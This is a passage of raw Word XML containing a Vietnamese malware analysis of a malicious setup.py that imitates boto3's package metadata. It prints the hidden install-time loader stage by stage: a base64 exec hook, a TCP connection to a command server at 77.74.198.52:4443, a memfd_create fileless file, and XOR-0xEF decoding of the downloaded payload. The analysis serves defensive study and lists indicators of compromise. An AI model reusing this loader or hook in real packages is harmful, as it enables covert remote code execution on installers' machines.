        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Python :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 3.7',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381AE06" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Python :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 3.8',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FDD341" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Python :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 3.9',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E2B7E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        'Programming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Language :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Python :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>: 3.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F77A89" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24939E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    project_urls</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="153FD092" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>        'Documentation': 'https://boto3.amazonaws.com/v1/documentation/api/latest/index.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C311F0B" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>        'Source': 'https://github.com/boto/boto3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380D712" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C77A7F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B6F99" w14:textId="1D77995A" w:rsidR="00191F7F" w:rsidRDefault="00A35380" w:rsidP="00191F7F">
      <w:r>
        <w:t>Phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD237A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Ngay đầu file xuất hiện lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946EDD7" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>exec(__import__('base64'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>decode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>'aW1wb3J0IGN0eXBlcw...'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F27F2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Lệnh này thực hiện ba thao tác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C5CC2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Import module base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F6368" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t>Giải mã chuỗi Base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE559F6" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">Thực thi trực tiếp nội dung sau giải mã bằng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8E94A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Điểm đáng chú ý là đoạn mã này nằm trước toàn bộ phần </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>setuptools.setup</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(). Vì vậy, khi người dùng chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DA9B31" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>python3 setup.py install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04808271" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>payload bị che giấu trong Base64 sẽ được thực thi ngay lập tức, trước khi quá trình cài đặt package thông thường diễn ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118E225" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="0F357C2D">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A88F04" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Kết nối tới máy chủ điều khiển để tải payload tiếp theo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578363AB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau khi giải mã Base64, stage đầu tiên chứa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66938171" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>IP = "77.74.198.52"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9C296" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>PORT = 4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140ADBF9" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>ADDR = (IP, PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA58D03" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>SIZE = 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F96B7" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Tiếp theo, chương trình tạo TCP socket và kết nối tới địa chỉ trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5B03E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">client = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A6F21E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    socket.AF_INET,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A36090" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>socket.SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>_STREAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC2AEF" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7FC9F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="36334BE2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>client.connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(ADDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2FB22" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Từ đoạn code có thể xác định IOC mạng đầu tiên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9945FB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> 77.74.198.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E86FA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>Port :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> 4443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412CE1AA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Đây là máy chủ cung cấp payload stage 2 cho tiến trình độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D9FD1D" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="11E9901C">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D030E1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Tạo file ẩn trong bộ nhớ bằng memfd_create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EFFE95" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Payload gọi trực tiếp syscall số 319:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D06619C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">fd = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>ctypes.CDLL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(None</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).syscall</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(319, "", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB8274" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>Trên Linux x86-64, syscall 319 là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08285B75" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>memfd_create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F495DA4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Hàm này tạo một anonymous file chỉ tồn tại trong memory và được truy cập thông qua file descriptor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A10A8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Trong trường hợp này, file được tạo không có tên trên filesystem thông thường. Nó chỉ có thể được truy cập qua đường dẫn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7DB9BA" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>/proc/self/fd/&lt;fd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4ACCFE" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Đây là kỹ thuật thực thi fileless, giúp payload không xuất hiện dưới dạng file ELF thông thường trên ổ đĩa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6FD7E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="484A39C5">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7457C714" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Nhận payload từ C2 và giải mã bằng XOR 0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D314A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Payload được tải theo từng khối 1024 byte:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD8DACB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E81B3" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    data = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>client.recv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(SIZE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D295DB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380"/>
    <w:p w14:paraId="50CBC6B4" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    if not data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492C08E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CF1E744" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Mỗi byte nhận được được XOR với giá trị 239:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67421A2E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>for i in data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF347ED" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="291B3A8C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        f"/proc/self/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>fd/{fd}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1D29F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">        "ab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19D55C" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>).write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>bytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>[i ^ 239]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1AFBB8" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Giá trị khóa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F379EC1" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve">239 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>decimal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t xml:space="preserve"> = 0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D234F2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Thuật toán giải mã:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5245F1CB" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>decoded_byte = encrypted_byte XOR 0xEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6059D654" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:lastRenderedPageBreak/>
        <w:t>Sau khi giải mã, dữ liệu được ghi trực tiếp vào anonymous memfd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71804FB2" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Do việc XOR đã được thực hiện trước khi ghi, nội dung recover từ file descriptor là payload đã giải mã hoàn chỉnh và không cần XOR thêm lần nữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E512E" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="62970BDD">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD32BF" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35380">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Đóng kết nối sau khi tải payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690857A" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Sau khi nhận hết dữ liệu, chương trình đóng socket:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D8D15" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>client.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A35380">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7E98F" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:t>Kết nối đã được sử dụng để tải payload rồi bị đóng trước khi bộ nhớ được thu thập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF7E7FE" w14:textId="77777777" w:rsidR="00A35380" w:rsidRPr="00A35380" w:rsidRDefault="00A35380" w:rsidP="00A35380">
      <w:r w:rsidRPr="00A35380">
        <w:pict w14:anchorId="57AEFA32">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
